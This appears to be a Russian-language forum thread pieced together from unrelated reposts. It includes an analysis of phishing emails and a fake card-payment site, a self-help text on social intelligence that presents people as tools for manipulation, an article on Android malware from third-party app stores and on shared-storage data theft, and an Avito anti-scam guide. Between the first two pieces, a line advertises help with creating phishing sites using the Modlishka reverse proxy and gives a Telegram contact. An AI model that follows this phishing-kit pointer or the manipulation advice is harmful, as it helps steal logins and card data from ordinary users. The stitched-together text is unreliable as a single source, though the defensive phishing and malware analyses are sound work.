Все это делается на моменте эмоциональной нестабильности, для этого и дано 72 часа. Да, за это время жертва может немного успокоиться, но ожидание наказания всегда хуже самого наказания — и это еще один неплохой ход в пользу спамера.
Упоминание уязвимости роутера — тоже так себе затея, потому что если проверить данный факт, то модель может не совпасть, или подключение идет напрямую к компьютеру.
В итоге, если пройтись по всем маленьким недочетам и странностям, вырисовывается картина, что это вовсе и не про жертву. Но если ее охватят любые негативные эмоции — испуг или злоба — то по мере прочтения на детали уже никто обращать внимание не будет, и вероятно, злоумышленник получит свои деньги за несуществующие видеофайлы.
Следующее письмо было получено непосредственно автором. Пришло сразу 4 штуки с разницей во времени примерно 15 минут.
Рисунок 2. Фишинговое письмо
![Фишинговое письмо](/proxy.php?image=https%3A%2F%2Fanti- malware.ru%2Ffiles%2Fphishing-16-07-2019%2F2.png&hash=54050481395eb360a6e84d7fbede5339)
Жалостливая тематика больного ребенка и матери-одиночки, которым срочно нужны деньги для лекарств. Такие методы направлены на людей с активной жизненной позицией и личностей, обладающих «наивным состраданием» и излишней доверчивостью. Автор письма не скрывает, что это спам-рассылка, и просит помочь, называя номер карты для перевода денег.
В данном письме нет ни контактов, ни фото больного мальчика, ни имен (кроме Миши). Зато номер карты для перевода денег указать не забыли. Данное письмо приведено как образец неудачной спам-кампании.
Рисунок 3. Заголовки письма
![Заголовки письма](/proxy.php?image=https%3A%2F%2Fanti- malware.ru%2Ffiles%2Fphishing-16-07-2019%2F3.png&hash=4ba4c14ad9bb2dd45afba23ed080433f)
Отправлено было с почтового ящика на Яндексе, причем спамер не пользовался никакими специальными утилитами и сервисами. Заголовки чистые, как у обычного письма, отправленного через почтовую систему из браузера. Исключением является только один факт — отправлялось оно на один почтовый ящик, а пришло на другой.
Злоумышленник вбил адреса получателей (их было совсем немного) и отправил письма. Потрачено на данную акцию было не больше 15-20 минут, но и результат соответствующий.
И еще одно письмо:
Рисунок 4. Текст фишингового письма
![Текст фишингового письма](/proxy.php?image=https%3A%2F%2Fanti- malware.ru%2Ffiles%2Fphishing-16-07-2019%2F4.png&hash=e2268c339f3a18d9d62f64887f058381)
Текст направлен на алчную сторону человека. Громкий заголовок о перечислении денежных средств не смутит жадного человека, что он и не заключал никакого договора с такой компанией.
Подпись письма, скорее всего, соответствует оригиналу. Сайт, номер телефона и название компании — все оригинальное. Правильная подача — все разбросано так, что особо и не бросается в глаза середина письма, главное получить деньги.
Если присмотреться: company website не соответствует действительности и не существует. Номер телефона тоже не упоминается в Google, что уже странно.
Рисунок 5. Заголовки фишингового письма
![Заголовки фишингового письма](/proxy.php?image=https%3A%2F%2Fanti- malware.ru%2Ffiles%2Fphishing-16-07-2019%2F5.png&hash=44c8fa90c7f12ca6f1aa261d629b0407)
В заголовке письма в полях, связанных с прохождением письма, явно указывается сервер компании SendGrid (компания, предоставляющая услуги рассылки писем). Вряд ли оповещения о получении денег рассылаются массово через данный сервер для спама.
Обратный адрес хоть и соответствует действительности, но его можно легко заменить в поле «From» smtp-протокола, как и полностью заголовок письма.
В итоге: нереальные адреса, рассылка при помощи спам-серверов, номера телефонов, на которые невозможно дозвониться — все указывает на фишинг, и переходить по ссылкам в теле письма небезопасно.
Разбираем фишинговые сайты
В последнем письме приведена ссылка https://is.gd/SwnIQn, на котором якобы можно получить обещанные денежные средства. Как и предполагалось, происходит редирект на другой адрес https://is.gd/s2miuH, где речи о переводе нет, а требуется пройти некий опрос, который и принесет деньги, причем уже за 100 000 рублей.
Рисунок 6. Главная страница фишингового сайта
![Главная страница фишингового сайта](/proxy.php?image=https%3A%2F%2Fanti- malware.ru%2Ffiles%2Fphishing-16-07-2019%2F6.png&hash=f4ad8bfc720f1e3739ce42b6912b91f5)
Создатели утверждают, что при прохождении опроса необходимо ввести данные карты для того, чтобы выполнить тестовое списание денег в размере 160 рублей, которые они обязательно вернут с заслуженной суммой.
Рисунок 7. Фейковая платежная система
![Фейковая платежная система](/proxy.php?image=https%3A%2F%2Fanti- malware.ru%2Ffiles%2Fphishing-16-07-2019%2F7.png&hash=b1e155227ff1b55678cc145b745fb60b)
Фейковая платежная система, ради которой вся кампания и построена. Пользователь вводит данные банковской карты, и они утекают кардерам на действия, которые на сленге называются «вбив» или «обнал».
Система стара как мир — каждый хочет быть индивидуальным и получить легких денег, на эту уловку социальной инженерии и рассчитан данный фишинг. Платежная система скопирована с настоящей и вызывает подозрение, лишь если внимательно посмотреть на URL — <https://globalpay4.top/select/internal- account/235?label=donors>.
Если перейти лишь на https://globalpay4.top, то получим пустую страницу с надписью «top secret!».
Доменное имя имеет IP 185.254.188.69, и это не web-хостинг. Это выделенный сервер.
Рисунок 8. Информация об IP-адресе
![Информация об IP-адресе](/proxy.php?image=https%3A%2F%2Fanti- malware.ru%2Ffiles%2Fphishing-16-07-2019%2F8.png&hash=ea9fd4aac0a50efebf3cfb14131ac7d1)
Если учитывать фишинговую кампанию сайта в сумме с письмом, то очень много логических несовпадений: выплата по договору, а на сайте необходимо пройти опрос, подозрительный URL, чтобы получить деньги — сначала их надо отдать. Все эти неувязки должны наталкивать на мысли об обмане.
Выводы
Организуя фишинговые кампании, злоумышленники используют социальную инженерию как средство психологической атаки. Обычно это самые сильные аспекты человеческих качеств: злость, страх, сострадание и жалость. В случае грамотной манипуляции хакер выводит жертву на эмоции, при которых уже незаметны мелкие расхождения и неувязки. Однако дьявол кроется в деталях.
Для выявления и разоблачения фишинга необходимо находиться в состоянии эмоционального покоя, испытывать положительные эмоции, за исключением эйфории.
Под обязательную проверку попадают все контакты, которые указаны в письме. Если в теле письма есть неверные уточнения или утверждения, есть сомнения по поводу отправителя, в полях указаны сторонние адреса — это все является доказательством фишинга.
При переходе по ссылкам лучше открывать их в режиме инкогнито. Если в момент перехода на сайт браузер затребовал разрешения к камере, микрофону или включить Adode Flash, то делать этого не стоит, так как javascript локальный язык, и выполняется он на стороне клиента, а в коде может быть что угодно. Также необходимо обращать внимание на доменные имена и редиректы между сайтами. Вряд ли get-запросы со спецзнаками используют реальные фирмы.
Если следовать этим рекомендациям, то фишинг можно определить с очень высокой вероятностью.
Источник: <https://anti-malware.ru/analytics/Threats_Analysis/phishing- practical-analysis>
Кто поможет создать фишинговый сайт. Используйте модлишку
](http://github.com/drk1wi/Modlishka)
Modlishka. Reverse Proxy. . Contribute to drk1wi/Modlishka development by creating an account on GitHub.
github.com
Tg:@Gold9102
В 1920 году американский психолог Эдвард Ли Торндайк ввёл термин «социальный интеллект» , который описывает способность правильно понимать поведение людей. Данная способность, развитая человеком в результате эволюции, необходима для эффективного взаимодействия между представителями нашей расы и успешной социальной адаптации новых её членов.
В 1937 году другой американский психолог, Гордон Олпорт , автор «теории черт личности», связывал социальный интеллект со способностью высказывать быстрые, почти автоматические суждения о людях, прогнозировать наиболее вероятные реакции человека.
По его мнению, «социальный интеллект» — это особый дар, позволяющий нам приспосабливаться к социуму и облегчающий взаимоотношения с людьми.
Click to expand...
К социальному интеллекту, в контексте нашей современной жизни, я бы добавил и другой термин — «эмоциональный интеллект». Ведь выражение эмоций в подавляющем большинстве случаев является социальным инструментом.
В подтверждение социальной роли эмоций говорит хотя бы то, что мимика у слепых от рождения людей чрезвычайно бедна.
Термин «** эмоциональный интеллект»** (EI), введённый в 1990 году Питером Сэловеем и Джеком Майером , описывает способность человека распознавать эмоции, определять их происхождение и роль, генерировать и управлять ими ради эмоционального и интеллектуального роста.
Коэффициент EI, в отличие от всем понятного IQ, описывает способность человека правильно истолковывать обстановку и оказывать на неё влияние, интуитивно улавливать то, чего хотят и в чём нуждаются другие люди, понимать их сильные и слабые стороны, не поддаваться стрессу и быть обаятельным.
Так вот, возвращаясь к началу данной статьи, многие психологи в последнее время приходят к тому, что уровень «общего» интеллекта никак не коррелирует с уровнем социального интеллекта.
Шэлдон Купер , один из главных героев «Теории большого взрыва» —
классический пример человека с высоким IQ (в фильме называлось число 187) и
низким «социальным интеллектом».
Высокий интеллектуальный уровень является необходимым, однако отнюдь не достаточным условием социального развития личности, то есть он может помогать социальному развитию,но не замещать его.
Более того, высокий интеллект может полностью обесцениваться, в случае, когда его обладатель страдает** «социальной слепотой»** .
Наверняка у многих из вас есть примеры того, как умный парень (или девушка), общаясь, ведёт себя слегка неадекватно (не вписывается в «волну», на которой находятся все остальные) и провоцирует негативное отношение к себе.
Да что там, такие «фэйлы» наверняка были в жизни каждого из нас — неудачная шутка, неуместный смех или любая другая ситуация из нашего неудачного социального опыта.
Человек, настроенный на повышение своего социального интеллекта, постарается в деталях запомнить эту ситуацию, разобрать её «по косточкам» (что было «до», что было «после», почему такое произошло, как мне на самом деле следовало себя вести и так далее), чтобы усвоить опыт и не совершать этих ошибок в дальнейшем.
Результат осознания данного события закрепляется в когнитивных структурах психики в виде навыков, и чем больше у человека этих навыков, тем проще ему быть «своим» в социуме и достигать своих собственных целей, используя окружающих.
Как развить в себе социальный интеллект
1. Прокачивайте социальную восприимчивость.
Основа социального интеллекта — эмпатия или «социальная восприимчивость». Ключ к развитию этого навыка лежит в том, чтобы выйти за рамки своего эгоизма и обратить внимание на других людей. Более того, лучше не просто обратить на них внимание, а сконцентрироваться на том, что делает объект вашего наблюдения, как он это делает, зачем он это делает и так далее.
Нам, жителям мегаполисов, тренироваться в этом достаточно просто — спускайтесь в метро и не спешите утыкаться в смартфон с Angry Birds.Просто осмотритесь и выберите 3-4 человек для наблюдения.
Постарайтесь представить, куда они едут, какие мысли у них в голове. Понаблюдайте за их мимикой: какие эмоции в данный момент они испытывают? Постарайтесь представить, как этот человек разговаривает с другими, о чём спорит, как при этом будут проявляться его эмоции.
Со временем вы вдруг поймёте, что морщины на лице объекта вашего внимания довольно быстро начнут сами собой оживать в вашем воображении и «оживлять» спокойное лицо улыбкой или недовольной гримасой.
2. Учитесь разбираться в языке тела.
Современный человек — существо довольно скрытное, поэтому для того, чтобы лучше разбираться в том, что человек чувствует и какие мысли у него в голове, неплохо научиться читать «язык тела». Тут можно не изобретать велосипед и прочитать книжку Алана Пиза «Серия «А и Б = Формула успеха»». Ну или в качестве краткой «шпаргалки» — 75 признаков языка тела по Максу Эггерту.
3. Учитесь читать эмоции по лицу.
Согласно анатомическому атласу, у нас на лице 57 мышц. Благодаря этому наше лицо само по себе является мощным инструментом для коммуникаций, причём язык мимики зародился ещё до того, как в результате эволюции развился речевой аппарат. Соответственно и навыки чтения по лицу лежат в нашей генетической памяти глубже, чем лингвистические «надстройки», что делает их более универсальными.
Если вы смотрели сериал, снятый по мотивам книги Пола Экмана «Обмани меня », или даже читали саму книгу, то через некоторое время вы начнёте замечать, что большая часть наблюдений профессора Калифорнийского университета очень похожа на правду.
4. Учитесь слышать.
Слушать умеют большинство людей, однако вот слышать — далеко не все. Слушая собеседника, постарайтесь не просто выуживать только ценную для вас информацию (как вы это обычно делаете), а представлять через этот рассказ ту реальность, в которой живёт ваш визави. Не бойтесь задавать наводящие вопросы и дополнять эту реальность новыми деталями.
Через некоторое время вы будете удивлены тем, что в глазах собеседника ваш авторитет начнёт расти. Почему? Ведь вы ничего ему не рассказали, а только слушали и задавали наводящие вопросы!
5. Учитесь улавливать настроение.
Настроение людей — очень полезный индикатор для определения своевременности того или иного социального воздействия, необходимого вам. И навык быстрого определения настроения другого человека по обрывочным, на первый взгляд, сведениям, поможет вам оперативно скорректировать ваше поведение.
Вспомните, как в детстве по громкому хлопку двери и недовольному покашливанию в коридоре вы узнавали, в каком настроении пришёл ваш отец. Вам хватало всего нескольких косвенных признаков, чтобы понять, стоит ли давать дневник с двойкой на подпись или подождать, пока родитель поужинает и подобреет.
Комбинация навыков, прокаченных в чтении эмоций и языка тела, умение слушать, позволят вам с высокой точностью определить настроение нужного вам человека.
Click to expand...
6. Прокачивайте свой актёрский талант.
После того как вы немного освоите все вышеперечисленное, начинайте развивать свои актёрские таланты. Потому как одним из важных навыков социального интеллекта является способность приспосабливаться, подстраиваться под окружение.
И не стоит тут цитировать известную песню Макаревича «Однажды мир прогнётся под нас» — если наша цель состоит в том, чтобы научиться управлять социумом вокруг себя, то способность правдиво играть нужную в данный момент роль становится незаменимым инструментом.
А вышеупомянутый Гордон Олпорт и вовсе называл социальное приспособление ключевым продуктом социального интеллекта.
Вы можете быть большую часть своей жизни брутальным мачо, но если вам надо успокоить девочку, потерявшую своих родителей в толпе торгового центра, то вам придётся достать из глубин своей души розового пони и дать этой девочке увидеть его.
**
7. Научитесь управлять своими эмоциями.**
Те, кто увлекается фотографией, наверняка замечали, что спустя несколько тысяч кадров появляется интересный феномен — вы начинаете смотреть на окружающий вас мир как бы через видоискатель фотоаппарата, оценивать, насколько эта «картинка» интересна не тебе, а твоим друзьям или знакомым. То есть вы начинаете смотреть на этот мир как бы со стороны, точка восприятия реальности вдруг выходит за границы вашего сознания и оказывается где-то на вашей странице Facebook или ЖЖ.
Так вот, с вашими эмоциями надо научиться делать то же самое. Если вдруг вы почувствовали, что гнев, ярость, зависть, скорбь или другое сильное чувство, которое вы хотели бы взять под контроль, начинает проявляться, сместите центр восприятия реальности и взгляните на себя со стороны («А кто это такой гневный с такими смешно сморщенными губами?»). Взгляните на источник этой эмоции — к примеру, на вызвавшего ярость таксиста, вклинившегося в ваш ряд без поворотников и чуть не снёсшего вам половину бампера — и представьте, как он втянул голову в плечи, ожидая вашей негативной реакции. Вам станет легче.
Если же кто-то намеренно спровоцировал в вас ту или иную эмоцию (к примеру, есть люди, специально устраивающие эмоциональные «качели», чтобы узнать, что за человек перед тобой — им так проще общаться), то разберитесь, зачем этому человеку понадобилось вызывать ваш гнев (жалость, страх или смех). Возможно, вам с ним не по пути?
Не стоит забывать, что эмоции — отличный инструмент для манипуляций. Но прежде чем учиться с их помощью манипулировать другими, убедитесь, что свои эмоции вы держите под полным контролем.
8. Прокачивайте навыки публичных выступлений.
Человек, который не постеснялся сделать доклад на конференции, произнести тост на свадьбе или задать неудобный вопрос на общем собрании дачного кооператива, как минимум, на какое-то время завладел вниманием нескольких слушателей. А как максимум — смог вложить в их головы нужные ему мысли.
Если вы боитесь выступать публично, то обязательно пройдите курсы «Искусство презентации» или «Ораторское искусство», которых сейчас полно (как групповых, так и индивидуальных). Только во время публичных выступлений можно увидеть, как волнами меняется настроение слушателей, какие слова вызывают сильные эмоции, как меняется внимание и так далее.
Даже если вам не придётся делать доклад перед Советом Федерации, полученные навыки обязательно пригодятся вам в повседневной жизни.
Click to expand...
9. Играйте в «Мафию», «Монополию», покер и другие «социальные» настольные игры.
Несмотря на кажущуюся «несерьёзность» этого метода прокачки социального интеллекта, именно в настольных играх характеры людей начинают «играть красками», а если игра проходит в непринуждённой обстановке и с некоторым (умеренным) количеством алкоголя, то кроме весёлого настроения вы получите ещё и целый набор социальных навыков по чтению эмоций, определению лжи по косвенным признакам, сокрытию собственных эмоций и так далее.
Заключение
Если вы самонадеянно считаете, что эти рекомендации не для вас и у вас-то с
социальным интеллектом всё в полном порядке, то не обольщайтесь.
Развитие социального интеллекта — процесс бесконечный.
А если мы будем лениться и постепенно выстраивать вокруг себя «лояльное» окружение, забыв о тренировках социального интеллекта, то рано или поздно придёт мальчик, который вдруг покажет на вас: «А король-то голый!».
И, вероятнее всего, у поколения «рождённых в интернете» будут свои стандарты и оценки коэффициента EI.
В качестве примера того, как меняются социальные коммуникации, можно привести интересный обычай, существовавший каких-то 400 лет назад (во времена Шекспира) между мужчинами и женщинами: любовники были настолько одержимы запахом тел друг друга, что женщины нередко держали под мышкой очищенное яблоко до тех пор, пока оно не впитывало в себя их пот и запах. Они отдавали это «яблоко любви» своим партнерам, чтобы они могли вдыхать его аромат в их отсутствие.
Поэтому вполне возможно, что наши дети будут смотреть на наши социальные обычаи с такой же брезгливостью, как мы смотрим на этих любителей «яблок любви».
Spoiler
cafebazaar.ir, android.myapp.com, apkplz.net
Данные площадки появились вследствии цензуры и блокировки Google сервисов и/или серверов официальных приложений. Обычно они содержат местные аналоги популярных приложений и их модификации. Такие модификации (как этот иранский телеграм) содержат якобы новые, крутые фичи. В чем опасность таких приложений?
Вы никогда не знаете, что они на самом деле делают. К тому же, правительства некоторых стран не упускают возможность и публикуют свои модификации, с инструментами для слежения за пользователем.
Приложения с правительственной слежкой являются вредоносными по определению. Однажды, я изучал вредоносное приложение (результат Virustotal, образец тут, пароль:infected), которое сканировало телефон на наличие телеграм-клонов:
"com.hanista.mobogram"
"org.ir.talaeii"
"ir.hotgram.mobile.android"
"ir.avageram.com"
"org.thunderdog.challegram"
"ir.persianfox.messenger"
"com.telegram.hame.mohamad"
"com.luxturtelegram.black"
"com.talla.tgr"
"com.mehrdad.blacktelegram"
Данный список говорит о реальной актуальности и популярности таких приложений. Исследованние данного вредоноса, привело меня к статье, в которой рассказывается о клоне телеграма, которое распостранялось через маркет Cafebazaar , Иранским правительством. Цитата оттуда:
This looks to be developed to the specifications of the Iranian government enabling them to track every bit and byte put forward by users of the app.
Click to expand...
Сколько клонов телеграма вы видите?: (Источник)
Обычным пользователям защититься от этого практически невозможно, так как
другого выбора нет - официальные источники усиленно блокируются, а свои
продвигаются. Исследователи и антивирусные компании со всего мира, после
выявления зараженных приложений, оперативно сообщают об этом в Google и они
удаляются из Play Market, что очевидно, не распостраняется на стороннии
маркеты приложений. Так же на них не распостраняется политика Google,
относительно допуска размещаемых приложений.
Некоторые из маркетов очень популярны, как например Tencent My App , с 260 млн. пользователей в месяц ([Источник](https://www.appinchina.co/market/app- stores/))
Локальные приложения, используемые в рамках одного региона/страны, часто
используют одни и те же SDK (набор библиотек) для рекламного трекинга,
интеграции соц. сетей и т.д.. Если одна и та же библиотека используется в
нескольких приложениях, то с большой вероятностью, некоторые из этих
приложений, могут быть установлены у одного пользователя.
Такие библиотеки могут использовать возможности разных приложений, в которые они встроены, для кражи данных пользователя, в обход выданных разрешений. Например, одно приложение имеет доступ к получению IMEI, но не имеет доступа к интернету. Встроенная библиотека знает об этом и поэтому считывает IMEI и сохраняет его на SD карте в скрытой папке.
Та же библиотека встроенная в другое приложение, у которого есть доступ в интернет, но нету доступа к IMEI, считывает его со скрытой папки и отправляет на свой сервер. Данный способ использовался двумя китайскими компаниями Baidu и Salmonads. Подробнее об этом можете прочитать тут.
Фишинг
Классический фишинг, является основным инструментом международных группировок
и [спецслужб разных
стран](https://www.theverge.com/2018/1/18/16905464/spyware-lebanon-government-
research-dark-caracal-gdgs). Как это часто бывает, берется обычное приложение
мессенджер, в него добавляется функционал для слежения, а потом оно массово
рассылается, с пометкой “Посмотри, какое крутое приложение для общения”.
Доставка пользователям может осуществляется через соц. сети, спам
Whatsapp/Telegram, встроенная реклама на сайтах и т.д..
[Источник, стр
19.](https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-
Caracal_srr_20180118_us_v.1.0.pdf)
Фишинговые ссылки, в виде постов в фейсбуке:
[Источник, стр.
22](https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-
Caracal_srr_20180118_us_v.1.0.pdf)
Всплывающее окно на одном известном сайте
Телеграм боты/группы
Существуют телеграм боты, для скачивания apk файлов. Вместо легитимного
приложения, вам могут подсунуть вредоносное. Либо заразить запрашиваемое вами
приложение “на лету”. Работает это так - вы вводите команду боту/в группу, что
хотите скачать “Instagram”, скрипт на другой стороне скачивает его с Google
Play, распаковывает, добавляет вредоносный код, запаковывает обратно и
возвращает вам. Как это делается автоматически, я попытаюсь показать на
примере в ближайшем будущем.
Сторонние сайты-посредники
Пример: apkpure.com, apkmirror.com, apps.evozi.com/apk-downloader/
Существует огромное количество неофициальных сайтов, для скачивания андроид приложений. Некоторые из них предоставляют возможность загрузить свое приложение, которое может быть вредоносным. Пример загрузки на этом сайте:
Один из примеров малвари, которая распостранялась таким образом
(Источник):
Примерную статистику, для неофициальных источников, можно найти в Android
Security Report
2018
- 1.6 миллиардов заблокированных Google Play Protect установок не из Google
Play. Всего установок было гораздо больше.
Некоторые даже пишут [статьи](https://www.makeuseof.com/tag/using-android- without-google/), как это хорошо, пользоваться сторонними маркетами. Отдельный целый мир составляют сайты, которые распостраняют приложения без рекламы, взломанные платные приложения бесплатно, приложения с дополнительным функционалом:
Google play
Официальный источник имеет защиту от подозрительных приложений, под названием
Google Play Protect, которая использует машинное обучение для определения
степени вредоносности.
Но такая защита не в состоянии точно понять, какое приложение вредоносное, а какое нет, так как для этого требуется полная ручная проверка. Чем отличается шпионское приложение, которое мониторит все ваши передвижения, от приложения для бега? Исследователи постоянно [находят](https://www.zdnet.com/article/android-security-flashlight-apps-on- google-play-infested-with-adware-were-downloaded-by-1-5m-people/) [сотнями](https://www.zdnet.com/article/google-malware-in-google-play-doubled- in-2018-because-of-click-fraud-apps/) [зараженные](https://www.express.co.uk/life-style/science- technology/1143651/Android-warning-malware-Google-Play-Store-security-June-23) [приложения](https://www.vice.com/en_us/article/43z93g/hackers-hid-android- malware-in-google-play-store-exodus-esurv), опубликованные в Google Play.
Обычно вредоносное приложение называет себя google play services или схожим образом, и [ставит похожую иконку](https://www.zdnet.com/article/this-trojan- masquerades-as-google-play-to-hide-on-your-phone). Это вводит в заблуждение пользователей. Почему гугл плей не проверяет иконку на схожесть со своими официальными приложениями - непонятно. Однажды в телеграме, я поставил аватарку с бумажным самолетиком и меня заблокировали. Еще один способ, используемый вредоносными приложениями, это замена букв (“L” на “I”, “g” на “q”), для создания, похожего на официальное приложение, имени:
[Источник](https://ti.360.net/blog/articles/stealjob-new-android-malware-used-
by-donot-apt-group-en/).
Другие способы
The particular version appearing on Fire TV devices installs itself as an app called “Test” with the package name “com.google.time.timer”. Once it infects an Android device, it begins to use the device’s resources to mine cryptocurrencies and attempts to spread itself to other Android devices on the same network.
Click to expand...
Что такое Man-In-The-Disk?
Общественность обратила внимание на данный вектор атаки, после этой
[статьи](https://blog.checkpoint.com/2018/08/12/man-in-the-disk-a-new-attack-
surface-for-android-apps/). Советую, для начала, ее прочитать.
Для тех кто прочитал, добавлю от себя - модификация общих файлов других приложений, так же может привести к эксплуатации уязвимостей в библиотеках, которые используют эти файлы
Кто не прочитал, расскажу в кратце. Для начала, определимся с понятиями. В андроиде, память для приложений, разделяется на Internal Storage и External Storage. Internal storage - это внутренняя память приложения, доступная только ему и никому больше. Абсолютно каждому приложению на телефоне соответствует отдельный пользователь и отдельная папка с правами только для этого пользователя. Это отличный защитный механизм. External storage - основная память телефона, доступная всем приложениям (сюда же относится SD карта). Зачем она нужна? Возьмем приложение фоторедактор. После редактирования, вы должны сохранить фото, чтобы оно было доступно из галереи. Естественно, что если вы положите его в internal storage, то никому, кроме вашего приложения оно доступно не будет. Или бразуер, который скачивает все файлы в общую папку Downloads.
У каждого андроид приложения есть свой набор разрешений, которые оно запрашивает. Но с ними все не так хорошо. Среди них есть такие, на которые люди охотно закрывают глаза и не относятся серъезно. Среди них - READ_EXTERNAL_STORAGE. Оно позволяет приложению получать доступ к основной памяти телефона, а значит и ко всем данным других приложений. Никто ведь не удивиться, если приложение “блокнот” запросит данное разрешение. Ему может быть необходимо хранить там настройки и кэш. Манипуляция данными других приложений в external storage и есть атака Man-In-The-Disk. Другое, почти дефолтное, разрешение - INTERNET. Как видно из названия, оно позволяет приложению иметь доступ в сеть. Самое печальное, что пользователю не показывается специальное окно с просьбой дать это разрешение. Вы просто прописываете его в своем приложении и вам его дают.
Я скачал топ-15 казахстанских приложений и написал скрипт, который выводит статистику запрашиваемых разрешений. Как видите, READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE и INTERNET очень популярны.
Список протестированных приложений
2-GIS, AliExpress, Chocofood, Chrome, InDriver, Instagram, Kaspi, Kolesa, Krisha, Telegram, VK, WhatsApp, Yandex Music, Yandex Taxi ,Zakon KZ
Если вы пользуетесь Whatsapp, то все ваши сообщения хранятся в папке,
доступной всем приложениям.
Грубо говоря, любое приложение на вашем телефоне может их скачать и отправить
себе на сервер. А далее расшифровать с помощью любого доступного скрипта в
сети. А если поставить whatsapp на рутованый телефон, то все ваши переписки
хранятся в открытом виде. Видимо whatsapp не считает нужным даже использовать
шифрование, на таком “порченом” телефоне. Так же, в external storage, whatsapp
хранит SSLSessionCache (File-based cache of established SSL sessions). В
будущем, попытаюсь исследовать, как можно использовать эти файлы, полученные с
чужого телефона.
Телеграм и Инстаграм хранят в общей памяти закешированные изображения.
Практически все просматриваемые вами фото, и те которые вы пересылаете друг
другу, доступны любому приложению у вас на телефоне.
del
Представьте: выбираете вы машину. Заходите на «Авито» и видите, что двухлетнюю Киа Сид продают за 149 тысяч рублей. Практически даром.
Двухлетняя иномарка не может стоить как два седьмых айфона
Звоните продавцу, он подтверждает цену, но вот печаль: машина уже обещана
другому покупателю. Однако продавец согласен отдать автомобиль вам, нужно
только прислать ему задаток.
Ну что может случиться, правда?
Если вы уже вбиваете в интернет-банке номер карты, который прислал продавец,
остановитесь. Это обман, вы не увидите ни машины, ни денег.
Чтобы осложнить жизнь мошенникам, рассказываем, какие схемы они используют чаще всего.
ПОКУПАТЕЛЯМ
«Пришлите предоплату»
Как работает. Мошенник-продавец просит предоплату за товар или услугу, а
после перевода пропадает. Покупателя при этом заманивают низкой ценой, как в
случае с иномаркой за 149 тысяч.
Когда жертва откликнулась на объявление, мошенники спешат вытрясти аванс, пока человек не заметил обмана. Для этого рассказывают о других покупателях и высоком спросе.
Схему с предоплатой используют не только при продаже товаров. Например, нашли вы такую вакансию:
Опыт не нужен, график свободный, зарплата 100 тысяч
Условия сказочные. Но во время общения выясняется, что нужно сначала заплатить
за обучающие материалы и оформление страховки. Если вы за них заплатите,
работодателя вы после этого не увидите.
Вывод. Осторожно с предоплатой. Слишком выгодное предложение с предоплатой — скорее всего, обман.
ПРОДАВЦАМ И ПОКУПАТЕЛЯМ
«Перейдите по ссылке»
Как работает. Злоумышленники рассылают сообщения со спамом и вредоносными
ссылками. После перехода по ссылке на телефон попадет вирус, включится платная
подписка или через фишинг украдут данные карты.
Допустим, вы честно продаете двухлетнюю Киа Сид за нормальную цену. Но покупатели не звонят. Проходит неделя, другая, вы начинаете грустить.
Вдруг приходит смс: неизвестный отправитель обещает контакты покупателей или предлагает обмен и дает ссылку на фото.
По адресу сайта очевидно, что это не «Авито»
Покупателям такие сообщения тоже приходят, им обещают шикарные товары по
низким ценам или фотографии товара. Например, вы ищете щенка хаски — ну как не
перейти по ссылке и не посмотреть, какой он?
Мошенники гарантируют вашу безопасность
По ссылке находится либо файл с вредоносным кодом, либо сайт мошенников. Файл
установит на телефон программу, которая будет отправлять платные смс, получит
доступ к интернет-банку или другим способом украдет деньги.
Сайты мошенников имитируют известные ресурсы, например тот же «Авито». Вас попросят ввести либо данные карты, либо логин и пароль от аккаунта. В первом случае с карты украдут всё до копейки, во втором от вашего имени станут рассылать спам и вредоносные ссылки.
Посмотрите на адресную строку браузера: домен «Авито» — avito.ru, рядом вы найдете изображение замка. Это значит, что соединение зашифровано.
Смотрим на адрес сайта и значок замка. У сайта мошенников такого не будет
Вывод. Не переходите по ссылкам и не открывайте файлы, которые пришли от
незнакомых отправителей. Если сайт выглядит странно, проверьте адрес и значок
замка в браузере.
ПРОДАВЦАМ
«Скажите данные карты»
Как работает. Мошенник откликается на объявление, предлагает предоплату за
товар и выманивает у продавца данные карты — якобы для перевода. При этом он
будет просить не только номер карты, но и код из смс или с обратной стороны. С
этими данными мошенник ворует с карты деньги.
Представим, что вы наконец нашли покупателя, который хочет купить Киа Сид. Вам пишет молодой человек, не задает занудных вопросов про машину и даже предлагает предоплату. Кажется, риска нет, ведь деньги предлагают вам.
Чтобы не потерять ценного покупателя, вы сообщаете ему всё, что он просит для перевода: номер карты, имя, срок действия, цифры с обратной стороны и код- подтверждение из смс. Хотя для перевода достаточно номера карты и имени.
Надеемся, вы никогда не поучаствуете в такой беседе
Вывод. Не давайте никому данные карты и не рассказывайте, что приходит в
смс. Если деньги с карты пропали, немедленно звоните в банк.
«Авито» напоминает, какие данные держать в тайне
ПОКУПАТЕЛЯМ
«Берите скорее, не думайте, 200% качество»
Как работает. Мошенники продают не то, что обещали. Товар либо
некачественный, либо вовсе не тот. Например, под видом почти новой иномарки
продают битую машину или автомобиль, который числится в угоне. Покупателю,
который ищет хаски, подсовывают беспородных щенков с поддельной родословной.
Породистые хаски за 3000 рублей ездят только на иномарках за 149 000
Цены по таким предложениям в разы ниже рыночных, а при передаче товара
покупателя торопят, чтобы он не заметил обмана: «Давай скорее, я на поезд
опаздываю!»
Вывод. Встречайтесь с продавцом и тщательно, не спеша проверяйте товар. И еще раз: не верьте в халяву вроде породистых щенков за три тысячи рублей.
Жалуйтесь на мошенников
Чтобы защитить пользователей от обмана, «Авито» фильтрует опасные сообщения и
блокирует подозрительные аккаунты. В борьбе с мошенниками нам помогают
пользователи, которые жалуются на недостоверные предложения.
В каждом объявлении на «Авито» есть кнопка «Пожаловаться». Если вы заподозрили обман, обязательно сообщите нам. Сотрудники «Авито» расследуют каждое обращение. Если информация подтвердится, мы удалим объявление, заблокируем аккаунт мошенника и будем благодарны вам за помощь.
Если не верим, что это шкатулка Сталина, надо жаловаться
ПОКУПАТЕЛЯМ
«Слушайте, на сайте всё не совсем правильно»
Как работает. Мошенники завлекают жертву обещаниями низкой цены, а при встрече
называют другие условия.
Если вы покупаете дешевую иномарку, у вас не попросили предоплату и машина не битая, то при встрече окажется, что настоящая цена в два или три раза выше той, что указана в объявлении.
Если щенки за 3 тысячи оказались настоящими хаски, то выяснится, что цена на сайте — это только плата за документы. Сами щенки стоят еще 25 тысяч.
Нет, спасибо, не поедем
Вывод. Не тратьте время на нечестных продавцов. Чтобы определить
обманщика, включайте здравый смысл: хорошие вещи стоят дорого.
Если вы заподозрили мошенничество, прекратите общение и нажмите на кнопку «Пожаловаться» под объявлением.
Повторим
